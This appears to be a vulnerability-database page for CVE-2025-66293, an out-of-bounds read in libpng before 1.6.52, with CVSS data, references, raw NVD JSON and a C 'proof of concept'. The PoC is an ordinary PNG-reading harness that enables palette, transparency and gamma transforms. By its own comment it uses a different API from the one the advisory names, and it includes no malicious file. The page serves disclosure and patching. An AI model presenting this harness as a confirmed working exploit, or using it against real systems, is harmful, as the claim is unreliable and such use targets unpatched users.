Security Vulnerability Report
CVE-2025-66293 CVSS 7.1 HIGH

CVE-2025-66293

Published: 2025-12-03 21:15:53
Last Modified: 2025-12-16 19:12:50

Description

LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to 1.6.52, an out-of-bounds read vulnerability in libpng's simplified API allows reading up to 1012 bytes beyond the png_sRGB_base[512] array when processing valid palette PNG images with partial transparency and gamma correction. The PNG files that trigger this vulnerability are valid per the PNG specification; the bug is in libpng's internal state management. Upgrade to libpng 1.6.52 or later.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:libpng:libpng:*:*:*:*:*:*:*:* - VULNERABLE
libpng < 1.6.52

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
// CVE-2025-66293 PoC - Malicious PNG trigger
// Requirements: A specially crafted PNG with palette, partial transparency,
// and gamma correction.
// Note: this harness drives libpng's classic png_read_* API; the advisory
// text names the simplified (png_image) API as the affected code path.
#include <stdio.h>
#include <stdlib.h>
#include <png.h>

void process_png(const char *filename)
{
    FILE *fp = fopen(filename, "rb");
    if (!fp) {
        perror("fopen");
        return;
    }

    png_structp png = png_create_read_struct(PNG_LIBPNG_VER_STRING, NULL, NULL, NULL);
    if (!png) {
        fclose(fp);
        return;
    }
    png_infop info = png_create_info_struct(png);
    if (!info) {
        png_destroy_read_struct(&png, NULL, NULL);
        fclose(fp);
        return;
    }

    // libpng reports decode errors via longjmp; land here on any failure
    if (setjmp(png_jmpbuf(png))) {
        printf("Error reading PNG\n");
        png_destroy_read_struct(&png, &info, NULL);
        fclose(fp);
        return;
    }

    png_init_io(png, fp);
    png_read_info(png, info);

    // Trigger vulnerability: palette + transparency + gamma
    int width = png_get_image_width(png, info);
    int height = png_get_image_height(png, info);
    png_byte color_type = png_get_color_type(png, info);
    png_byte bit_depth = png_get_bit_depth(png, info);
    (void)width;
    (void)bit_depth;

    // Convert to RGBA if palette type
    if (color_type == PNG_COLOR_TYPE_PALETTE) {
        png_set_palette_to_rgb(png);
    }

    // Enable transparency handling (tRNS chunk -> alpha channel)
    if (png_get_valid(png, info, PNG_INFO_tRNS)) {
        png_set_tRNS_to_alpha(png);
    }

    // Enable gamma correction - THIS TRIGGERS THE BUG
    double gamma;
    if (png_get_gAMA(png, info, &gamma)) {
        png_set_gamma(png, 2.2, gamma);
    }

    png_read_update_info(png, info);

    // Allocate and read rows
    png_bytep *row_pointers = (png_bytep *)malloc(sizeof(png_bytep) * height);
    if (!row_pointers) {
        png_destroy_read_struct(&png, &info, NULL);
        fclose(fp);
        return;
    }
    for (int y = 0; y < height; y++) {
        row_pointers[y] = (png_byte *)malloc(png_get_rowbytes(png, info));
    }
    png_read_image(png, row_pointers);

    // Cleanup
    for (int y = 0; y < height; y++) {
        free(row_pointers[y]);
    }
    free(row_pointers);
    png_destroy_read_struct(&png, &info, NULL);
    fclose(fp);
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("Usage: %s <png_file>\n", argv[0]);
        return 1;
    }
    process_png(argv[1]);
    return 0;
}

References

Weakness: CWE-125 (Out-of-bounds Read)

https://github.com/pnggroup/libpng/commit/788a624d7387a758ffd5c7ab010f1870dea753a1 (Patch)
https://github.com/pnggroup/libpng/commit/a05a48b756de63e3234ea6b3b938b8f5f862484a (Patch)
https://github.com/pnggroup/libpng/issues/764 (Exploit, Issue Tracking, Patch)
https://github.com/pnggroup/libpng/security/advisories/GHSA-9mpm-9pxh-mg4f (Exploit, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2025/12/03/6 (Mailing List)
http://www.openwall.com/lists/oss-security/2025/12/03/7 (Mailing List)
http://www.openwall.com/lists/oss-security/2025/12/03/8 (Mailing List)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66293", "sourceIdentifier": "[email protected]", "published": "2025-12-03T21:15:53.060", "lastModified": "2025-12-16T19:12:50.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to 1.6.52, an out-of-bounds read vulnerability in libpng's simplified API allows reading up to 1012 bytes beyond the png_sRGB_base[512] array when processing valid palette PNG images with partial transparency and gamma correction. The PNG files that trigger this vulnerability are valid per the PNG specification; the bug is in libpng's internal state management. Upgrade to libpng 1.6.52 or later."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libpng:libpng:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.52", "matchCriteriaId": "98FBE7B9-73DC-483B-87E8-5229792557C3"}]}]}], "references": [{"url": "https://github.com/pnggroup/libpng/commit/788a624d7387a758ffd5c7ab010f1870dea753a1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pnggroup/libpng/commit/a05a48b756de63e3234ea6b3b938b8f5f862484a", "source": "[email protected]", "tags": ["Patch"]}, {"url": 
"https://github.com/pnggroup/libpng/issues/764", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}, {"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-9mpm-9pxh-mg4f", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/03/6", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/03/7", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/03/8", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}, {"url": "https://github.com/pnggroup/libpng/issues/764", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Patch"]}]}}